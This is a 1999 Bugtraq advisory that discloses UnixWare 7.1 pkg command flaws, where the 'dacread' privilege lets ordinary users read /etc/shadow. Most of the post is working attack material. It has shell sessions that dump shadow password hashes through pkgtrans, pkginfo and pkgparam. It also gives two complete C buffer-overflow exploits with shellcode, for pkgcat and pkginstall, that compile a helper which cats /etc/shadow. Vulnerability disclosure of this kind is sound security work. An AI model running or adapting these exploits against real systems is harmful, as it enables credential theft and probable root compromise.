=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Сб, 04 дек 1999  21:42:54

   От: Brock Tellier <btellier@USA.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: UnixWare pkg* command exploits

--------------------------------------------------------------------------------




Greetings,



OVERVIEW

Most of UnixWare's pkg commands can be exploited to print /etc/shadow, leading

to a probable root compromise.



BACKGROUND

Only tested on UnixWare 7.1.



DETAILS

The permissions for the UnixWare pkg commands are as follows:

bash-2.02$ ls -la /usr/sbin/pkgchk /usr/bin/pkginfo /usr/bin/pkgparam

/usr/bin/pkgtrans /usr/sadm/install/bin/pkgname /usr/sbin/pkgcat

/usr/sbin/pkginstall

-r-xr-xr-x    1 bin      sys          176620 May 21  1999 /usr/bin/pkginfo

-r-xr-xr-x    1 root     sys          166784 May 21  1999 /usr/bin/pkgparam

-r-xr-xr-x    1 bin      bin          166216 May 21  1999 /usr/bin/pkgtrans

-r-xr-xr-x    1 root     sys            3288 May 21  1999

/usr/sadm/install/bin/pkgname

-rwxr-xr-x    1 root     bin           19436 May 21  1999 /usr/sbin/pkgcat

-r-x------    1 root     sys          179440 May 21  1999 /usr/sbin/pkgchk

-rwxr-xr-x    1 root     bin           19680 May 21  1999

/usr/sbin/pkginstall

bash-2.02$ 



Note that none of these have any elevated modebit-based privileges.  Now let's

check out /etc/security/tcb/privs:

bash-2.02$ cat /etc/security/tcb/privs | grep pkg

179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk

176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo

166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam

166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans

3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname

19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat

19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall



As far as I can tell, the pkgname program doesn't actually do anything and we

obviously can't exec pkgchk.  The rest of these programs are all vulnerable to

/etc/shadow printing exploits.  pkg* are able to access /etc/shadow because of

the "dacread" permission, which allows the process to override the file

permissions and ownership (but only for reading or executing).



Two of the exploits below are buffer overflow exploits which execute /tmp/pi. 

/tmp/pi is a program built by the exploit which simply cats /etc/shadow.  Thus

any spawned process of a prived program gains the same privileges as that

program.  



EXPLOIT OUTPUT

-------------- pkgtrans

For this exploit, download the attached "dut.tar" and follow the instructions

below.  dut.tar simply conforms to the pkgmap/info conventions and allows it

to read /etc/shadow.





bash-2.02$ cp dut.tar /tmp        

bash-2.02$ cd /tmp

bash-2.02$ tar xvf dut.tar

x dut/, 0 bytes, 0 tape blocks

x dut/pkginfo, 276 bytes, 1 tape block

x dut/pkgmap, 39 bytes, 1 tape block

x dut/install/, 0 bytes, 0 tape blocks

x dut/install/shadow symbolic link to /etc/shadow

bash-2.02$ pkgtrans -s /tmp /tmp/pkgtrans.shadow



The following packages are available:

  1  dut     Brock Tellier's pkgtrans exploit, install and cat

/tmp/pkgtrans.shadow  for your copy of /etc/shadow

             (IA32) .01a



Select package(s) you wish to process (or 'all' to process

all packages). (default: all) [?,??,quit]: 1

Transferring <dut> package instance to

      </tmp/pkgtrans.shadow> in datastream format

bash-2.02$ cat /tmp/trans.shadow | grep root

root:rfAf3OC7XHsj.:10925::::::

bash-2.02$  



------------- pkginfo



bash-2.02$ truss -rall -aefo pkginfo.out pkginfo -d /etc/shadow; cat

pkginfo.out | grep "r o o t"

UX:pkginfo: ERROR: attempt to process package from </etc/shadow> failed

    - bad format in datastream table-of-contents

truss: cannot control child process, pid# 9188



- KILL TRUSS PROCESS FROM ANOTHER VT - 



Killed

9187:    r o o t : r f A f 3 O C 7 X H s j . : 1 0 9 2 5 : : : : : :\n d

bash-2.02$ 



------------- pkginstall



bash-2.02$ /usr/sbin/pkginstall -s `./uwpkgi 100`:



UnixWare 7.1 pkginstall exploit prints/etc/shadow

Brock Tellier btellier@usa.net



Using addr: 0x8046c3d

root:rfAf3OC7XHsj.:10925::::::

daemon:NP:6445::::::

bin:NP:6445::::::

...



-------------- pkgcat



bash-2.02$ /usr/sbin/pkgcat -s `./uwpkgcat 100`:



UnixWare 7.1 pkgcat exploit prints/etc/shadow

Brock Tellier btellier@usa.net



Using addr: 0x8046c3d

root:rfAf3OC7XHsj.:10925::::::

daemon:NP:6445::::::

bin:NP:6445::::::

sys:NP:6445::::::

...



------------ pkgparam

bash-2.02$ pkgparam -f /etc/shadow

rfAf3OC7XHsj.:10925::::::

NP:6445::::::

NP:6445::::::

...



EXPLOITS

--- uwpkgcat.c ---

/**

 ** UnixWare 7.1 /usr/sbin/pkgcat exploit 

 ** Prints contents of /etc/shadow (execing shell won't be enough here)

 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission

 ** problems.  Use offsets of +-100.

 **

 ** Compile cc -o uwpkgcat uwpkgcat.c

 ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`:

 **

 ** Brock Tellier btellier@usa.net

 **/ 





#include <stdlib.h>

#include <stdio.h>



char scoshell[]= 

"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"

"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"

"\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";



                       

#define LEN 3500

#define NOP 0x90

#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"



void buildpi() {

  FILE *fp;

  char cc[100];



  fp = fopen("/tmp/pi.c", "w");

  fprintf(fp, CODE);

  fclose(fp);

  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");

  system(cc);



}



int main(int argc, char *argv[]) {



long int offset=0;



int i;

int buflen = LEN;

long int addr;

char buf[LEN];

buildpi(); 

 if(argc > 3) {

  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);

        exit(0); 

 }

 else if (argc == 2){

   offset=atoi(argv[1]);

   

 }

 else if (argc == 3) {

  offset=atoi(argv[1]);

  buflen=atoi(argv[2]); 

   

 }

 else {

   offset=100;

   buflen=3000;



 }

 



addr=0x8046b75 + offset;



fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints");

fprintf(stderr, "/etc/shadow\n");

fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");

fprintf(stderr, "Using addr: 0x%x\n", addr+offset);



memset(buf,NOP,buflen);

memcpy(buf+(buflen/2),scoshell,strlen(scoshell));

for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)

        *(int *)&buf[i]=addr;

buf[buflen - 1] = ':';



printf(buf);

exit(0);

}

------



--- uwpkgi.c ---

/**

 ** UnixWare 7.1 /usr/sbin/pkginstall exploit 

 ** Prints contents of /etc/shadow (execing shell won't be enough here)

 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission

 ** problems.  Use offsets of +-100.

 **

 ** Compile cc -o uwpkgi uwpkgi.c

 ** run /usr/sbin/pkginstall -s `./uwpkgi 100`:

 **

 ** Brock Tellier btellier@usa.net

 **/ 





#include <stdlib.h>

#include <stdio.h>



char scoshell[]= 

"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"

"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"

"\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";



                       

#define LEN 3500

#define NOP 0x90

#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"



void buildpi() {

  FILE *fp;

  char cc[100];



  fp = fopen("/tmp/pi.c", "w");

  fprintf(fp, CODE);

  fclose(fp);

  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");

  system(cc);



}



int main(int argc, char *argv[]) {



long int offset=0;



int i;

int buflen = LEN;

long int addr;

char buf[LEN];

buildpi(); 

 if(argc > 3) {

  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);

        exit(0); 

 }

 else if (argc == 2){

   offset=atoi(argv[1]);

   

 }

 else if (argc == 3) {

  offset=atoi(argv[1]);

  buflen=atoi(argv[2]); 

   

 }

 else {

   offset=100;

   buflen=3000;



 }

 



addr=0x8046b75 + offset;



fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints");

fprintf(stderr, "/etc/shadow\n");

fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");

fprintf(stderr, "Using addr: 0x%x\n", addr+offset);



memset(buf,NOP,buflen);

memcpy(buf+(buflen/2),scoshell,strlen(scoshell));

for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)

        *(int *)&buf[i]=addr;

buf[buflen - 1] = ':';



printf(buf);

exit(0);

}

------



Brock Tellier

UNIX Systems Administrator

Chicago, IL, USA

btellier@usa.net



____________________________________________________________________

Get free email and a permanent address at http://www.netaddress.com/?N=1